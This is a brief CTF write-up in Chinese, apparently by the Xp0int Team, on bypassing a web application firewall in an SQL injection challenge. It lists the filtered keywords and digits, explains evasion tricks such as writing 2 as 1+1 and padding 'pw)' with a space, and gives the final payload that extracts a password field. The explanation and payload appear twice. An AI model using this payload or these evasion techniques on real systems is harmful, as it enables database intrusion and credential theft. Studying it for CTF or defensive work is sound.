Xp0int Team
Mostly a CTF Writeup places主要代码
就是一个绕waf的sql注入
简单的测试waf过滤了=,like,where,pw),2,3,4,5,9
2可以用1+1代替,如此类推,pw)只要在中间加空格就可绕过
最终payload
flag=0&hi=%2B(conv(hex((select substr((select pw ),1%2B1,1))),16,10))
就是一个绕waf的sql注入
简单的测试waf过滤了=,like,where,pw),2,3,4,5,9
2可以用1+1代替,如此类推,pw)只要在中间加空格就可绕过
flag=0&hi=%2B(conv(hex((select substr((select pw ),1%2B1,1))),16,10))